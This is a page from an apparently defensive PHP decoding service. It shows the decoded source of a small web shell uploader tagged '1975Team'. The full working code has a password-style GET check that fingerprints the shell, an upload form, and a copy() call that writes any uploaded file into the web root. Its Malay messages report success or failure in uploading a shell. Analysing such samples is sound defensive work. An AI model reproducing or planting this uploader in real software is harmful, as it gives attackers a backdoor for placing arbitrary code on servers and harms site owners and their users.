Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if ($_GET["shell"] == "utchiha"){echo "l7WA";} echo "1975Team"; echo '<form actio..
Decoded Output download
1975Team<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>
Did this file decode correctly?
Original Code
<?php
if ($_GET["shell"] == "utchiha"){echo "l7WA";}
echo "1975Team";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Upload Shell Korang!!!<b><br><br>'; }
else { echo '<b>Korang Gagal Upload Shell Korang!!!</b><br><br>'; }
}
?>
Function Calls
None |
Stats
MD5 | 6e4c81c2a912197b6b24da3a4afd0654 |
Eval Count | 0 |
Decode Time | 113 ms |